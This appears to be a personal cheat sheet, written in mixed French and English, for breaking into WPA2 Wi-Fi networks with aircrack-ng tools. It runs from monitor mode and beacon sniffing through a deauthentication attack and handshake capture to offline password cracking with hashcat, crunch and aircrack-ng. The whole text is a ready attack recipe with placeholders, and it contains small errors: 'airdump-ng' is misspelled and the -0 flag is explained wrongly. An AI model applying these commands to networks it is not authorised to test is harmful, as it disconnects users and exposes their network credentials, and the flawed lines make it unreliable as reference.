#########################################
########          SETUP          ########
#########################################

# Lister les interfaces sans-fil supportant le mode monitor:
airmon-ng

# Activer/désactiver le mode monitor d'une interface:
airmon-ng start|stop <interface>

#########################################
########         SNIFFING        ########
#########################################

# Démarrer l'écoute des Beacon frames:
airdump-ng <interface>

#########################################
########      DEAUTH ATTACK      ########
#########################################

# Deauth attack:
aireplay-ng -0 2 -a <ap_MAC> -c <client_MAC> <interface>
    
    -0  : specifies we would like to send 2 deauth packets (recommended) 

#########################################
######## CAPTURE 4-WAY HANDSHAKE ########
#########################################

# Capturer une 4-way Handshake:
# Stocke les données récoltées dans un fichier .cap
airodump-ng -c <channel_nb> --bssid <bssid> -w <output_directory> <interface>
    
    -c      : channel
    --bssid : filtrer les APs via leur BSSID (adresse mac)
    -w      : dossier de destination où écrire le fichier .cap

#########################################
########    CRACKING PASSWORD    ########
#########################################

# Convert .cap file(s) in .hccapx (hashcat file format):
cap2hccapx <foo.cap> <foo.hccapx>

# Cracking with hashcat (GPU):
# Passwords list can be generated by crunch
crunch <min_length> <max_length> <charset>| hashcat -m <hash_type_nb> <foo.hccapx>

# Cracking with aircrack-ng (CPU):
aircrack-ng -a2 -b <bssid> -w <wordlist.txt> <foo.cap>
    
    -a2 : specifies WPA2
